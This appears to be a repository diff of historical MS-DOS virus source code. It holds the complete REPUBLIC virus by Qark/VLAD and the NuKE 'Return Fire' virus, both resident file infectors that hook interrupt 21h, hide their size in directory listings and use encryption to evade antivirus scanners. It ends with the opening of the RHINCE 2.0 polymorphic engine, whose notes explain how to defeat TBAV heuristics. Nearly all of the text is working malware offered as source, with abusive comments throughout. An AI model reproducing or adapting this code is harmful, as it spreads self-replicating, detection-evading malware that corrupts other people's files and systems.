FLOPPY_COUNT DW ? ;Number of floppy infections since drop.
FLOPPY_MODAY DW ? ;Month and day of last floppy infection.
FLOPPY_YEAR DW ? ;Year of last floppy infection.
FLOPPY_TIME DW ? ;Time of last floppy infection.
INFECT_TAG2 DW INF_TAG2 ;Infection tag for VIRUS_DIR.
UPDATE_FLAG DB CLEAR ;Flag indicating floppy infection since last
;HD access.
;
DB 3 DUP 00 ;End-of-sector pad bytes.
;
;End of directory sector viral code.
;----------------------------------------------------------------------------------------------
;Start of MBR disk buffer.
;
MBR_BUFFER:
;
;----------------------------------------------------------------------------------------------
;
CODE ENDS
MSDOS/R-Index/Virus.MSDOS.Unknown.republic.asm
+830
View File
@@ -0,0 +1,830 @@
; REPUBLIC!
; +-------+ Qark/VLAD
;
;
; This virus is named because I (and metabolis) support a republic for
; Australia. Fuck the Union Jack off from our flag... we want something
; Australian in there... and an Australian head of state not some pommy
; bitch Queen and her corgis.
;
; A funny thing: I wrote a full-on MTE/TPE/DAME type polymorphic engine
; for this virus, but TBScan found it every time! But when i do the
; shitty XOR routine that's at the end, TBScan hardly finds anything!
; TBAV can be proud of it's capabilites with polymorphism, but for
; basic encryption it's a big thumbs down...
;
; Stats:
; - Disinfect on open, Infect on close.
; - No directory filesize change
; - No findfirst filesize change
; - Some anti-debugging features
;
; Anyway, this is my best virus so far. I've come a fair way since broken,
; fucked up brother in VLAD#1 I'm sure you'll agree. I wrote this virus
; a few months ago and am better than this already.
;
; As always, the A86 assembler is my favourite :)
org 0
db 0beh ;MOV SI,xxxx
delta dw offset enc_start + 100h
cld
call encrypt
enc_start:
push cs
pop ds ;DS=CS
sub si,offset enc_end ;The polymorphism is done.
mov word ptr [si+offset quit],20cdh
quit:
mov word ptr [si+offset quit],44c7h ;The bytes changed.
push es
push si
;If I don't get a feed soon, I'll start to fade...
mov ax,0FEEDh ;Feed ?
int 21h
cmp ax,0FADEh ;Yes...
je resident ;Fade...
mov ax,es
dec ax
mov ds,ax
cmp byte ptr [0],'Z'
jne resident
sub word ptr [3],160 ;2560 bytes of memory.
sub word ptr [12h],160 ;2560 bytes off TOM.
mov bx,word ptr [12h] ;Read in the TOM.
push cs
pop ds ;DS=CS
xor ax,ax ;ES=0 (Vector Table)
mov es,ax
mov ax,word ptr es:[132] ;Get int21h.
mov word ptr [si+offset i21],ax
mov ax,word ptr es:[134] ;Get int21h segment.
mov word ptr [si+offset i21+2],ax
mov es,bx ;ES=Segment to store virus.
xor di,di ;Zero in memory.
mov cx,offset length ;The size of the virus.
rep movsb ;Move the virus.
xor ax,ax
mov ds,ax ;ES=0 (Vector Table)
mov word ptr [132],offset infection
mov [134],bx ;BX=Virus Seg I hope!
resident:
pop si ;SI=IP (Virus start)
pop es ;ES=PSP
push cs
pop ds
cmp byte ptr [si+offset com_exe],1
je exe_exit
mov ax,word ptr [si+offset old3]
mov [100h],ax
mov al,byte ptr [si+offset old3+2]
mov [102h],al
push es
pop ds
call zero_all
mov ax,100h
jmp ax
Exe_Exit:
mov ax,es ;ES=PSP
add ax,10h ;EXE file start.
add word ptr [si+jump+2],ax
call zero_all
mov sp,word ptr [si+offset orig_sp]
add ax,word ptr [si+offset orig_ss] ;Fix SS with AX.
mov ss,ax
push es
pop ds
db 0eah
jump dd 0
Message db 'Go the Republic! '
db 'Fuck off Royal Family!',0
Creator db 'Qark/VLAD of the Republic of Australia',0
Infection:
push ax
xchg al,ah
cmp ax,004bh ;Exec. Don't infect on 4B01h because
je test_inf ;debug will find it then.
cmp al,43h ;Chmod.
je test_inf
cmp al,56h ;Rename.
je test_inf
cmp al,6ch ;Open.
je dis_inf
cmp al,3dh ;Open
je dis_inf
cmp al,11h ;FCB find.
je dir_listing
cmp al,12h ;Dir listing in progress.
je dir_listing
cmp al,4eh ;Find first.
je find_file
cmp al,4fh ;Find_next.
je find_file
cmp al,3eh ;Close.
je end_infect
pop ax
cmp ax,0FEEDh
je res_check ;Testing for installation ?
jump_exit:
jmp jend ;Exit TSR
res_check:
mov ax,0FADEh ;Return parameter.
iret
dir_listing:
jmp dir_stealth
find_file:
jmp search_stealth
dis_inf:
jmp full_stealth ;Disinfect on the fly.
end_infect:
jmp close_infect
jump2_exit:
jmp far_pop_exit ;Just an exit.
test_inf:
push bx
push cx
push dx
push si
push di
push ds
push es
call check_name
jc jump2_exit
mov ax,3d00h ;Open readonly.
mov dx,di ;DX=DI=Offset length
call int21h
jc jump2_exit
mov bx,ax
call get_sft
;Test for infection.
mov ax,word ptr es:[di+0dh] ;File time into AX from SFT.
mov word ptr es:[di+2],2 ;Bypass Read only attribute.
and ax,1f1fh ;Get rid of the shit we don't need.
cmp al,ah ;Compare the seconds with minutes.
je jump2_exit
Handle_Infection:
push cs
pop es ;ES=CS
;Read the File header in to test
;for EXE or COM.
mov ah,3fh ;Read from file.
mov cx,1ch ;1C bytes.
call int21h ;DX=Offset length from file open.
;We don't need the filename anymore
;so use that space as a buffer.
mov si,dx ;SI=DX=offset length.
mov di,offset header
mov cx,18h
rep movsb ;Move header to header.
mov si,dx ;SI=DX=Offset of length.
mov ax,word ptr [si] ;=Start of COM or EXE.
add al,ah ;Add possible MZ.
cmp al,167 ;Test for MZ.
je exe_infect
jmp com_infect
EXE_infect:
mov byte ptr com_exe,1 ;Signal EXE file.
cmp word ptr [si+1ah],0 ;Test for overlays.
jne exe_close_exit ;Quick... run!!!
push si ;SI=Offset of header
add si,0eh ;SS:SP are here.
mov di,offset orig_ss
movsw ;Move them!
movsw
mov di,offset jump ;The CS:IP go in here.
lodsw ;ADD SI,2 - AX destroyed.
movsw
movsw ;Move them!
pop si
call get_sft ;ES:DI = SFT for file.
mov ax,word ptr es:[di+11h] ;File length in DX:AX.
mov dx,word ptr es:[di+13h]
mov cx,16 ;Divide by paragraphs.
div cx
sub ax,word ptr [si+8] ;Subtract headersize.
mov word ptr delta,dx ;Initial IP.
add delta,offset enc_start ;Fix for polymorphics.
mov word ptr [si+14h],dx ;IP in header.
mov word ptr [si+16h],ax ;CS in header.
add dx,offset stack_end ;Fix SS:SP for file.
mov word ptr [si+0eh],ax ;We'll make SS=CS
mov word ptr [si+10h],dx ;SP=IP+Offset of our buffer.
mov ax,word ptr es:[di+11h] ;File length in DX:AX.
mov dx,word ptr es:[di+13h]
add ax,offset length ;Add the virus length on.
adc dx,0 ;32bit
mov cx,512 ;Divide by pages.
div cx
and dx,dx
jz no_page_fix
inc ax ;One more for the partial
;page!
no_page_fix:
mov word ptr [si+4],ax ;Number of pages.
mov word ptr [si+2],dx ;Partial page.
mov word ptr es:[di+15h],0 ;Lseek to start of file.
call get_date ;Save the old time/date.
mov ah,40h ;Write header to file.
mov dx,si ;Our header buffer.
mov cx,1ch ;1CH bytes.
call int21h
jc exe_close_exit
mov ax,4202h ;End of file. Smaller than
;using SFT's.
xor cx,cx ;Zero CX
cwd ;Zero DX (If AX < 8000H then
;CWD moves zero into DX)
call int21h
call enc_setup ;Thisll encrypt it and move
;it to the end of file.
exe_close_exit:
jmp com_close_exit
com_infect:
mov byte ptr com_exe,0 ;Flag COM infection.
mov ax,word ptr [si] ;Save COM files first 3 bytes.
mov word ptr old3,ax
mov al,[si+2]
mov byte ptr old3+2,al
call get_sft ;SFT is at ES:DI
mov ax,es:[di+11h] ;AX=File Size
cmp ax,64000
ja com_close_exit ;Too big.
cmp ax,1000
jb com_close_exit ;Too small.
push ax ;Save filesize.
mov newoff,ax ;For the new jump.
sub newoff,3 ;Fix the jump.
mov word ptr es:[di+15h],0 ;Lseek to start of file :)
call get_date ;Save original file date.
mov ah,40h
mov cx,3
mov dx,offset new3 ;Write the virus jump to start of
call int21h ;file.
pop ax ;Restore file size.
jc com_close_exit ;If an error occurred... exit.
mov word ptr es:[di+15h],ax ;Lseek to end of file.
add ax,offset enc_start + 100h ;File size + 100h.
mov word ptr delta,ax ;The delta offset for COM files.
call enc_setup
com_close_exit:
mov ah,3eh
call int21h
far_pop_exit:
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
jend:
db 0eah ;Opcode for jmpf
i21 dd 0
int21h proc near ;Our int 21h
pushf
call dword ptr cs:[i21]
ret
int21h endp
close_infect:
cmp bl,4
ja good_handle
pop ax
jmp jend
Good_Handle:
push bx ;Save the original registers.
push cx
push dx
push si
push di
push ds
push es
call get_sft ;ES:DI = SFT
mov ax,word ptr es:[di+0dh] ;AX=Time
and ax,1f1fh ;Shit we don't need.
cmp al,ah ;AL=AH means infected.
je far_pop_exit
mov dx,offset length
push cs
pop ds
mov word ptr es:[di+2],2 ;Read/Write mode.
mov word ptr es:[di+15h],0 ;Zero file pointer.
mov word ptr es:[di+17h],0 ;Zero file pointer.
add di,28h ;ES:DI=Extension
cmp word ptr es:[di],'OC'
je close_com
cmp word ptr es:[di],'XE'
jne far_pop_exit
Close_Exe:
inc di
inc di
cmp byte ptr es:[di],'E'
jne far_pop_exit
jmp handle_infection
Close_Com:
cmp byte ptr es:[di+2],'M'
jne far_pop_exit
jmp handle_infection
;-------
Full_Stealth:
push bx
push cx
push dx
push si
push di
push ds
push es
cmp al,6ch
jne stealth_6c
mov dx,si
stealth_6c:
call check_name
jnc do_stealth
Stealth_end:
jmp far_pop_exit
Do_Stealth:
mov ax,3d00h
mov dx,di
call int21h
jc stealth_end
mov bx,ax ;BX=filehandle
call get_sft
;ES:DI=SFT
mov ax,word ptr es:[di+0dh] ;File time into AX from SFT.
mov word ptr es:[di+2],2 ;Bypass Read only attribute.
and ax,1f1fh ;Get rid of the shit we don't need.
cmp al,ah ;Compare the seconds with minutes.
jne stealth_end ;Not infected...
mov ax,word ptr es:[di+11h] ;File size.
mov dx,word ptr es:[di+13h]
push dx
push ax
sub ax,1ch ;Header+time+date = 1ch
sbb dx,0
mov word ptr es:[di+15h],ax ;File pointer.
mov word ptr es:[di+17h],dx
mov ah,3fh
mov dx,offset header ;Read in header.
mov cx,1ch
call int21h
pop ax
pop dx ;DX:AX=length of file
sub ax,offset length ;EOF - length.
sbb dx,0
mov word ptr es:[di+15h],ax
mov word ptr es:[di+17h],dx
mov ah,40h ;Truncate virus off.
xor cx,cx
call int21h
jc stealth_end
mov word ptr es:[di+15h],0 ;Start of file
mov word ptr es:[di+17h],0
mov ah,40h
mov dx,offset header
mov cx,18h
call int21h ;Write original header back.
mov cx,word ptr time
mov dx,word ptr date
mov ax,5701h ;Put original time/date back.
call int21h
mov ah,3eh ;Close file.
call int21h
jmp stealth_end
Check_Name proc near
;Entry:
;DS:DX=Filename
;
;Exit:
;Carry if bad name.
;DS=ES=CS
;AX is fucked.
;SI = File Extension Somewhere.
;DI = Offset length.
mov si,dx ;DS:SI = Filename.
push cs
pop es ;ES=CS
mov ah,60h ;Get qualified filename.
mov di,offset length ;DI=Buffer for filename.
call int21h ;This converts it to uppercase too!
;CS:LENGTH = Filename in uppercase
;with path and drive. Much easier
;to handle now!
push cs
pop ds ;DS=CS
mov si,di ;SI=DI=Offset Length
cld ;Forward!
find_ascii_z:
lodsb
cmp al,0
jne find_ascii_z
sub si,4 ;Points to the file extension. 'EXE'
lodsw ;Mov AX,DS:[SI]
cmp ax,'XE' ;The 'EX' out of 'EXE'
jne test_com
lodsb ;Mov AL,DS:[SI]
cmp al,'E' ;The last 'E' in 'EXE'
jne Bad_Name
jmp do_file ;EXE-file
test_com:
cmp ax,'OC' ;The 'CO' out of 'COM'
jne Bad_Name
lodsb ;Mov AL,DS:[SI]
cmp al,'M'
je do_file ;COM-file
Bad_Name:
stc
ret
do_file:
clc
ret
Check_Name endp
Search_Stealth:
pop ax ;Restore AX.
call int21h
jc end_search
push es
push bx
push si
mov ah,2fh
call int21h
mov si,bx
mov bx,word ptr es:[si+16h]
and bx,1f1fh
cmp bl,bh
jne search_pop ;Is our marker set ?
sub word ptr es:[si+1ah],offset length ;Subtract the file length.
sbb word ptr es:[si+1ch],0
search_pop:
pop si
pop bx
pop es
clc
end_search:
retf 2 ;This is the same as an IRET
;except that the flags aren't popped
;off so our Carry Remains set.
Dir_Stealth:
;This bit means that wen you do a 'dir' there is no change in
;file size.
pop ax
call int21h ;Call the interrupt
cmp al,0 ;straight off.
jne end_of_dir
push es
push ax ;Save em.
push bx
push si
mov ah,2fh ;Get DTA address.
call int21h
mov si,bx
cmp byte ptr es:[si],0ffh ;Extended FCB ?
jne not_extended
add si,7 ;Add the extra's.
not_extended:
mov bx,word ptr es:[si+17h] ;Move time.
and bx,1f1fh
cmp bl,bh
jne dir_pop ;Is our marker set ?
sub word ptr es:[si+1dh],offset length ;Subtract the file length.
sbb word ptr es:[si+1fh],0
dir_pop:
pop si
pop bx
pop ax
pop es
end_of_dir:
iret
Get_Date proc near
mov ax,5700h ;Get Date/Time.
call int21h
mov word ptr time,cx
mov word ptr date,dx
ret
Get_date endp
Set_Marker proc near
mov cx,time
mov al,ch
and al,1fh
and cl,0e0h
or cl,al
mov dx,date
mov ax,5701h
call int21h
ret
Set_marker endp
Enc_Setup proc near
push cs
pop es
in al,40h
mov byte ptr cs:cipher,al
xor si,si
mov di,offset length ;Offset of our buffer.
mov cx,offset length ;Virus Length.
rep movsb ;Move the virus up in memory for
;encryption.
mov si,offset length + offset enc_start
call encrypt ;Encrypt virus.
mov ah,40h ;Write virus to file
mov dx,offset length ;Buffer for encrypted virus.
mov cx,offset length ;Virus length.
call int21h
call set_marker ;Mark file as infected.
ret
Enc_setup endp
Get_SFT Proc Near
;Entry: BX=File Handle.
;Exit: ES:DI=SFT.
push bx
mov ax,1220h ;Get Job File Table Entry. The byte pointed
int 2fh ;at by ES:[DI] contains the number of the
;SFT for the file handle.
xor bx,bx
mov bl,es:[di] ;Get address of System File Table Entry.
mov ax,1216h
int 2fh
pop bx
ret
Get_SFT EndP
Zero_All proc near
;Zero's everything cept AX.
xor bx,bx ;Zero BX
mov cx,bx
mov dx,bx
mov di,bx
ret
Zero_All endp
New3 db 0e9h ;The jump for the start of
Newoff dw 0 ;COM files.
orig_ss dw 0
orig_sp dw 0
com_exe db 0
old3 db 0cdh,20h,90h
enc_end: ;Encryption ends here.
; QaRK's |<-RaD TBSCaN eVaDeR!!!!!111
; Works every time :)
encrypt proc near
;Si = enc_start
mov cx,offset enc_end - offset enc_start
db 0b0h ;=MOV AL,xx
cipher db 0
enc_loop:
ror al,1
neg al
xor cs:[si],al ;<--- Whoah! Never guess this was encryption!
add al,al
inc si
loop enc_loop
ret
Encrypt endp
header db 18h dup (0) ;rewrite this
time dw 0 ;restore this
date dw 0
length db 200 dup (0)
stack_end:
MSDOS/R-Index/Virus.MSDOS.Unknown.return-f.asm
+443
View File
@@ -0,0 +1,443 @@
;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
;³ THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. ³ [NuKE] PoWeR
;³ CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN ³ [NuKE] WaReZ
;³ auToR: aLL [NuKE] MeMeBeRS ³ [NuKE] PoWeR
;³ [NuKE] THe ReaL PoWeR! ³ [NuKE] WaReZ
;³ NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 ³ [NuKE] PoWeR
;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
.286
code segment
assume cs:code,ds:code
org 100h
start: CALL NEXT
NEXT:
mov di,sp ;take the stack pointer location
mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus
sub bp,offset next ;subtract the large code off this code
;
;*******************************************************************
; #1 DECRYPT ROUTINE
;*******************************************************************
cmp byte ptr cs:[crypt],0b9h ;is the first runnig?
je crypt2 ;yes! not decrypt
;----------------------------------------------------------
mov cx,offset fin ;cx = large of virus
lea di,[offset crypt]+ bp ;di = first byte to decrypt
mov dx,1 ;dx = value for decrypt
;----------------------------------------------------------
deci: ;deci = fuck label!
;----------------------------------------------------------
ÿinc word ptr [di]
inc byte ptr [di]
add word ptr [di],0e6e9h
sub byte ptr [di],01fh
add byte ptr [di],05fh
ÿinc di
inc di
;----------------------------------------------------------
jmp bye ;######## BYE BYE F-PROT ! ##########
mov ah,4ch
int 21h
bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!###
;-----------------------------------------------------------
mov ah,0bh ;######### BYE BYE TBAV ! ##########
int 21h ;### (CANGE INT AT YOU PLEASURE) ###
;----------------------------------------------------------
loop deci ;repeat please!
;
;*****************************************************************
; #2 DECRYPT ROUTINE
;*****************************************************************
;
crypt: ;fuck label!
;
mov cx,offset fin ;cx = large of virus
lea di,[offset crypt2] + bp ;di = first byte to decrypt
;---------------------------------------------------------------
deci2: ;
xor byte ptr cs:[di],1 ;decrytion rutine
inc di ;very simple...
loop deci2 ;
;---------------------------------------------------------------
crypt2: ;fuck label!
;
MOV AX,0CACAH ;call to my resident interrup mask
INT 21H ;for chek "I'm is residet?"
CMP Bh,0CAH ;is equal to CACA?
JE PUM2 ;yes! jump to runnig program
call action
;*****************************************************************
; NRLG FUNCTIONS (SELECTABLE)
;*****************************************************************
ÿ;****************************************************************
; PROCESS TO REMAIN RESIDENT
;****************************************************************
mov ax,3521h
int 21h ;store the int 21 vectors
mov word ptr [bp+int21],bx ;in cs:int21
mov word ptr [bp+int21+2],es ;
;---------------------------------------------------------------
push cs ;
pop ax ;ax = my actual segment
dec ax ;dec my segment for look my MCB
mov es,ax ;
mov bx,es:[3] ;read the #3 byte of my MCB =total used memory
;---------------------------------------------------------------
push cs ;
pop es ;
sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus
sub bx,17 + offset fin ;and 100H for the PSP total
mov ah,4ah ;used memory
int 21h ;put the new value to MCB
;---------------------------------------------------------------
mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin
mov ah,48h ;
int 21h ;request the memory to fuck DOS!
;---------------------------------------------------------------
dec ax ;ax=new segment
mov es,ax ;ax-1= new segment MCB
mov byte ptr es:[1],8 ;put '8' in the segment
;--------------------------------------------------------------
inc ax ;
mov es,ax ;es = new segment
lea si,[bp + offset start] ;si = start of virus
mov di,100h ;di = 100H (psp position)
mov cx,offset fin - start ;cx = lag of virus
push cs ;
pop ds ;ds = cs
cld ;mov the code
rep movsb ;ds:si >> es:di
;--------------------------------------------------------------
mov dx,offset virus ;dx = new int21 handler
mov ax,2521h ;
push es ;
pop ds ;
int 21h ;set the vectors
;-------------------------------------------------------------
pum2: ;
;
mov ah,byte ptr [cs:bp + real] ;restore the 3
mov byte ptr cs:[100h],ah ;first bytes
mov ax,word ptr [cs:bp + real + 1] ;
mov word ptr cs:[101h],ax ;
;-------------------------------------------------------------
mov ax,100h ;
jmp ax ;jmp to execute
;
;*****************************************************************
;* HANDLER FOR THE INT 21H
;*****************************************************************
;
VIRUS: ;
;
cmp ah,4bh ;is a 4b function?
je REPRODUCCION ;yes! jump to reproduce !
cmp ah,11h
je dir
cmp ah,12h
je dir
dirsal:
cmp AX,0CACAH ;is ... a caca function? (resident chek)
jne a3 ;no! jump to a3
mov bh,0cah ;yes! put ca in bh
a3: ;
JMP dword ptr CS:[INT21] ;jmp to original int 21h
ret ;
make db '[NuKE] N.R.L.G. AZRAEL'
dir:
jmp dir_s
;-------------------------------------------------------------
REPRODUCCION: ;
;
pushf ;put the register
pusha ;in the stack
push si ;
push di ;
push bp ;
push es ;
push ds ;
;-------------------------------------------------------------
push cs ;
pop ds ;
mov ax,3524H ;get the dos error control
int 21h ;interupt
mov word ptr error,es ;and put in cs:error
mov word ptr error+2,bx ;
mov ax,2524H ;change the dos error control
mov dx,offset all ;for my "trap mask"
int 21h ;
;-------------------------------------------------------------
pop ds ;
pop es ;restore the registers
pop bp ;
pop di ;
pop si ;
popa ;
popf ;
;-------------------------------------------------------------
pushf ;put the registers
pusha ;
push si ;HEY! AZRAEL IS CRAZY?
push di ;PUSH, POP, PUSH, POP
push bp ;PLEEEEEAAAAAASEEEEEEEEE
push es ;PURIFY THIS SHIT!
push ds ;
;-------------------------------------------------------------
mov ax,4300h ;
int 21h ;get the file
mov word ptr cs:[attrib],cx ;atributes
;-------------------------------------------------------------
mov ax,4301h ;le saco los atributos al
xor cx,cx ;file
int 21h ;
;-------------------------------------------------------------
mov ax,3d02h ;open the file
int 21h ;for read/write
mov bx,ax ;bx=handle
;-------------------------------------------------------------
mov ax,5700h ;
int 21h ;get the file date
mov word ptr cs:[hora],cx ;put the hour
mov word ptr cs:[dia],dx ;put the day
and cx,word ptr cs:[fecha] ;calculate the seconds
cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX)
jne seguir ;yes! the file is infected!
jmp cerrar ;
;------------------------------------------------------------
seguir: ;
mov ax,4202h ;move the pointer to end
call movedor ;of the file
;------------------------------------------------------------
push cs ;
pop ds ;
sub ax,3 ;calculate the
mov word ptr [cs:largo],ax ;jmp long
;-------------------------------------------------------------
mov ax,04200h ;move the pointer to
call movedor ;start of file
;----------------------------------------------------------
push cs ;
pop ds ;read the 3 first bytes
mov ah,3fh ;
mov cx,3 ;
lea dx,[cs:real] ;put the bytes in cs:[real]
int 21h ;
;----------------------------------------------------------
cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ?
jne er1 ;yes! is a EXE... fuckkk!
;----------------------------------------------------------
jmp cerrar
er1:
;----------------------------------------------------------
mov ax,4200h ;move the pointer
call movedor ;to start fo file
;----------------------------------------------------------
push cs ;
pop ds ;
mov ah,40h ;
mov cx,1 ;write the JMP
lea dx,[cs:jump] ;instruccion in the
int 21h ;fist byte of the file
;----------------------------------------------------------
mov ah,40h ;write the value of jmp
mov cx,2 ;in the file
lea dx,[cs:largo] ;
int 21h ;
;----------------------------------------------------------
mov ax,04202h ;move the pointer to
call movedor ;end of file
;----------------------------------------------------------
push cs ;
pop ds ;move the code
push cs ;of my virus
pop es ;to cs:end+50
cld ;for encrypt
mov si,100h ;
mov di,offset fin + 50 ;
mov cx,offset fin - 100h ;
rep movsb ;
;----------------------------------------------------------
mov cx,offset fin
mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus
enc: ;
xor byte ptr cs:[di],1 ;encrypt the virus
inc di ;code
loop enc ;
;---------------------------------------------------------
mov cx,offset fin
mov di,offset fin + 50 + (offset crypt - offset start) ;virus
mov dx,1
enc2: ;
ÿsub byte ptr [di],05fh
add byte ptr [di],01fh
sub word ptr [di],0e6e9h
dec byte ptr [di]
dec word ptr [di]
ÿinc di
inc di ;the virus code
loop enc2 ;
;--------------------------------------------
mov ah,40h ;
mov cx,offset fin - offset start ;copy the virus
mov dx,offset fin + 50 ;to end of file
int 21h ;
;----------------------------------------------------------
cerrar: ;
;restore the
mov ax,5701h ;date and time
mov cx,word ptr cs:[hora] ;file
mov dx,word ptr cs:[dia] ;
or cx,word ptr cs:[fecha] ;and mark the seconds
int 21h ;
;----------------------------------------------------------
mov ah,3eh ;
int 21h ;close the file
;----------------------------------------------------------
pop ds ;
pop es ;restore the
pop bp ;registers
pop di ;
pop si ;
popa ;
popf ;
;----------------------------------------------------------
pusha ;
;
mov ax,4301h ;restores the atributes
mov cx,word ptr cs:[attrib] ;of the file
int 21h ;
;
popa ;
;----------------------------------------------------------
pushf ;
pusha ; 8-( = f-prot
push si ;
push di ; 8-( = tbav
push bp ;
push es ; 8-) = I'm
push ds ;
;----------------------------------------------------------
mov ax,2524H ;
lea bx,error ;restore the
mov ds,bx ;errors handler
lea bx,error+2 ;
int 21h ;
;----------------------------------------------------------
pop ds ;
pop es ;
pop bp ;restore the
pop di ;resgisters
pop si ;
popa ;
popf ;
;----------------------------------------------------------
JMP A3 ;jmp to orig. INT 21
;
;**********************************************************
; SUBRUTINES AREA
;**********************************************************
;
movedor: ;
;
xor cx,cx ;use to move file pointer
xor dx,dx ;
int 21h ;
ret ;
;----------------------------------------------------------
all: ;
;
XOR AL,AL ;use to set
iret ;error flag
;***********************************************************
; DATA AREA
;***********************************************************
largo dw ?
jump db 0e9h
real db 0cdh,20h,0
hora dw ?
dia dw ?
attrib dw ?
int21 dd ?
error dd ?
ÿ;---------------------------------
action: ;Call label
MOV AH,2AH ;
INT 21H ;get date
CMP Dl,byte ptr cs:[action_dia+bp] ;is equal to my day?
JE cont ;nop! fuck ret
cmp byte ptr cs:[action_dia+bp],32 ;
jne no_day ;
cont: ;
cmp dh,byte ptr cs:[action_mes+bp] ;is equal to my month?
je set ;
cmp byte ptr cs:[action_mes+bp],13 ;
jne NO_DAY ;nop! fuck ret
set: ;
mov AH,9 ;yeah!!
MOV DX,OFFSET PAO ;print my text!
INT 21H ;now!
INT 20H ;an finsh te program
NO_DAY: ;label to incorrect date
ret ;return from call
;---------------------------------
ÿ
PAO:
DB 10,13,'YOU ARE INFECTED WITH A VIRUS!!! "RETURN FIRE!" ver 2.8 "F-prot cannot survive!!"','$'
;*****************************************************
dir_s:
pushf
push cs
call a3 ;Get file Stats
test al,al ;Good FCB?
jnz no_good ;nope
push ax
push bx
push es
mov ah,51h ;Is this Undocmented? huh...
int 21h
mov es,bx
cmp bx,es:[16h]
jnz not_infected
mov bx,dx
mov al,[bx]
push ax
mov ah,2fh ;Get file DTA
int 21h
pop ax
inc al
jnz fcb_okay
add bx,7h
fcb_okay: mov ax,es:[bx+17h]
and ax,1fh ;UnMask Seconds Field
xor al,byte ptr cs:fechad
jnz not_infected
and byte ptr es:[bx+17h],0e0h
sub es:[bx+1dh],OFFSET FIN - OFFSET START ;Yes minus virus size
sbb es:[bx+1fh],ax
not_infected:pop es
pop bx
pop ax
no_good: iret
;********************************************************************
; THIS DIR STEALTH METOD IS EXTRAC FROM NUKEK INFO JOURNAL 4 & N-POX
;*********************************************************************
ÿaction_dia Db 07H ;day for the action
action_mes Db 04H ;month for the action
FECHA DW 01eH ;Secon for mark
FECHAd Db 01eH ;Secon for mark dir st
fin:
code ends
end start
MSDOS/R-Index/Virus.MSDOS.Unknown.rhince20.asm
+315
View File
@@ -0,0 +1,315 @@
; RHINCE 2.0, by Rhincewind [Vlad]
;
; This is the accompanying textfile for RHINCE v2.0, where RHINCE stands for
; "Rickety and Hardly Insidious yet New Chaos Engine". There's been quite
; a lot of feedback on the original release, both positive and negative. The
; negative reviews mainly dealt with the engine being so obscenely
; ineffective. To you I say, you missed the point: RHINCE was and is an
; experiment in writing small polymorphic engines using tables.
;
; I rewrote RHINCE because I came up with a method that I hoped would make
; it much, much shorter, say, under 300 bytes. Not so I'm afraid, the pure
; v1.0 rewrite amounted to 367 bytes.
;
; This version doesn't use encoding routines that use tables. No, it uses
; one encoding routine and a set of tables. In almost every engine, the
; routines all have a certain structure in common and yet they're never quite
; the same so optimisation by using subroutines is difficult. This is an
; easier approach:
;
; Encoding takes place byte for byte, and a tablestring is used to describe
; it's specifics. First byte in the string is the commandbyte:
;
; bit 4 quote next byte.
; bit 3 get random choice. next byte is the number of choices,
; followed by the choices themselves.
; bit 2 next byte is a mask indicating which bits to randomise.
; bit 1 next byte is a mask for ANDing, the byte thereafter
; is an illegal choice for the masked byte.
; bit 0 next byte is a byte displacement used to jump to.
; (for table optimisation)
;
; The commandbyte is followed by the arguments for the bit 4 command if it
; was set, then the arguments for bit 3 if it was set, et cetera. It's all
; in the code.
;
; So the original rewrite was finished but the engine's performance was still
; approximately zero. Tweaking done:
;
; ** DAA DAS AAA AAS opcodes removed. flagged by TBAV (@)
; ** $+2 flowcontrol removed. flagged by TBAV (G)
; JO/JNO branching flagged by TBAV (@)
; ** Forced first opcode to not be an flagged by TBAV (G)
; opcode needing previous register
; contents
; ** No longer builds decryptor inside flagged by TBAV (#)
; code, but rather on the heap.
;
; RHINCE v2.0 is almost TBAV heuristics proof. A negligible amount of
; samples still gets G flags on pointer references in the first 32 bytes.
; Then there is the occasional E, U, t or D flag probably caused
; by Thunderbyte interpreting the random byte and word values as code,
; i.e. signature scanning.
;
; Thunderbyte's heuristics are really interesting. The G flag for operations
; with uninitialised registers can only be triggered by the first 32 bytes
; of code (or so). The $+2 flowcontrol check is active throughout the
; program but the check for self-modifying code (which is how it detected
; v1.0) is only active in the first 512 bytes.
;
; Call Parameters: CX length of code to encrypt
; DS:DX pointer to code to encrypt
; BP offset code will be run at.
; Return Parameters: CX length of decryptor+encrypted code.
; DS:DX pointer to decryptor.
;
; Caution:Engine assumes CS=DS=ES. Also as said above, RHINCE v2.0 builds
; a decryptor on the heap. Please ensure that the heapspace is there!
; In COM infection mind the maximum filelength you can infect. In
; EXE infection you should check, and alter if necessary, the
; MINALLOC header field. If alteration of MINALLOC was necessary,
; see if MAXALLOC>MINALLOC. If not set MAXALLOC==MINALLOC.
;
; RHINCE v2.0: 377 bytes undiluted polymorphic generation code.
; - Rhince.
.model tiny
.code
org 100h
;Below is a small demogenerator. Assemble & run this file as is to generate
;an encrypted HELLO.COM file, cut/paste the engine code otherwise.
start:
mov ah,3ch
xor cx,cx
mov dx, offset file
int 21h
push ax
mov dx, offset prog
mov cx, (endprog-prog)
mov bp, 100h
call mut_eng
pop bx
mov ah, 40h
int 21h
mov ah, 3eh
int 21h
mov ah,9
mov dx, offset msg
int 21h
int 20h
file db 'hello.com',0
msg db 'Run HELLO.COM to decrypt and print a sacred VLAD scripture$'
prog: mov ah,9
call $+3
delta: pop dx
add dx, (str-delta)
int 21h
int 20h
str db 'At the word of the dark judges, that word which '
db 'tortures the spirit,',0dh,0ah
db 'Kantza-Merada, even the goddess, was turned to a '
db 'dead body,',0dh,0ah
db 'Defiled, polluted, a corpse hangin'' from a stake.'
